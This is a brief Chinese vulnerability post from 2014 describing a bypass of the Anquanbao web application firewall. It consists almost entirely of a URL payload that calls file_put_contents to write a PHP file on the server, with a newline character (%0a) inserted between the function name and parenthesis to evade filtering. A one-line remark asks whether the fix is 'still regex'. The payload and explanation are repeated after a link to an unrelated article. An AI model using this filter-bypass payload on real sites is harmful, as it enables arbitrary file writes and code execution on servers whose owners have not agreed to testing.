安全宝绕过之代码执行下载
-
来源:黑吧安全网 浏览:1015次 时间:2014-04-30
http://secaqb.anquanbao.org/exec.php?gp=file_put_contents%0a('seay.php',%22%3C?php%20phpinfo();?%3E%22);
%0a插在方法和(之间就绕过了~
修复方案:
还是正则?
上一篇: 百度某分站csrf漏洞可刷粉丝及修复下载
http://secaqb.anquanbao.org/exec.php?gp=file_put_contents%0a('seay.php',%22%3C?php%20phpinfo();?%3E%22);
%0a插在方法和(之间就绕过了~
修复方案:
还是正则?